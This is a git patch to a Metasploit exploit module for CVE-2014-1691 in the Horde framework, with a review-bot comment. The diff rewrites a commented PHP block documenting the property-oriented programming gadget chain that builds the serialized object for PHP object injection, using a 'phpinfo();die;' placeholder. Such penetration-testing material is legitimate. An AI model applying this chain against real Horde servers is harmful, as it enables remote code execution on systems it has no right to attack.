From 379c0efd5af2b104cbbc6ff52dec37a802497224 Mon Sep 17 00:00:00 2001
From: jvazquez-r7
Date: Tue, 18 Mar 2014 16:29:30 -0500
Subject: [PATCH] Update POP chain documentation
---
.../unix/webapp/horde_unserialize_exec.rb | 65 +++++++++----------
1 file changed, 30 insertions(+), 35 deletions(-)
diff --git a/modules/exploits/unix/webapp/horde_unserialize_exec.rb b/modules/exploits/unix/webapp/horde_unserialize_exec.rb
index 775d40b529..17457ca2c7 100644
--- a/modules/exploits/unix/webapp/horde_unserialize_exec.rb
+++ b/modules/exploits/unix/webapp/horde_unserialize_exec.rb
@@ -94,56 +94,51 @@ class Metasploit3 < Msf::Exploit::Remote end =begin + PHP chain by EgiX: http://karmainsecurity.com/exploiting-cve-2014-1691-horde-framework-php-object-injection -$phpcode = '"&&eval("phpinfo();die;")=="'; -  -class Horde_Date_Parser_Token +class Horde_Config { -   public $tags = array('A'); + protected $_oldConfig = "phpinfo();die;"; } -  + class Horde_Prefs_Scope { -   protected $_prefs; -  -   function __construct() -   { -      $this->_prefs = array($GLOBALS['phpcode'] => 1); -   } + protected $_prefs = array(1); } -  + class Horde_Prefs { -   protected $_opts, $_scopes; -  -   function __construct() -   { -      $this->_opts['sizecallback'] = array(new Horde_Date_Parser_Token, 'untag'); -      $this->_scopes['horde'] = new Horde_Prefs_Scope; -   } + protected $_opts, $_scopes; + + function __construct() + { + $this->_opts['sizecallback'] = array(new Horde_Config, 'readXMLConfig'); + $this->_scopes['horde'] = new Horde_Prefs_Scope; + } } -  + class Horde_Prefs_Identity { -   protected $_prefs, $_prefnames; -  -   function __construct() -   { -      $this->_prefs = new Horde_Prefs; -      $this->_prefnames['identities'] = $GLOBALS['phpcode']; -   } + protected $_prefs, $_prefnames; + + function __construct() + { + $this->_prefs = new Horde_Prefs; + $this->_prefnames['identities'] = 0; + } } -  + class Horde_Kolab_Server_Decorator_Clean { -   private $_server, $_added = array(1); -  -   function __construct() -   { -      $this->_server = new Horde_Prefs_Identity; -   } + private $_server, $_added = array(1); + + function __construct() + { + $this->_server = new Horde_Prefs_Identity; + } } -   + $popchain = serialize(new Horde_Kolab_Server_Decorator_Clean); + =end \ No newline at end of file
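Review bot: The file still ends without a trailing newline: the `\ No newline at end of file` marker follows the unchanged `=end` line at the bottom of this hunk, so the new side keeps that state, and ending the file with a newline avoids a spurious diff on `=end` the next time the block is edited. The block also does not say how the PHP between `=begin` and `=end` relates to the module; since it sits in a Ruby comment it is presumably reference material for how the serialized object is built, and a first line such as `Reference only (CVE-2014-1691): PHP used to build the serialized object, not executed by this module.` would state that, if that is the case. The `phpinfo();die;` value in `Horde_Config` looks like a placeholder and could be labelled as one in the same comment.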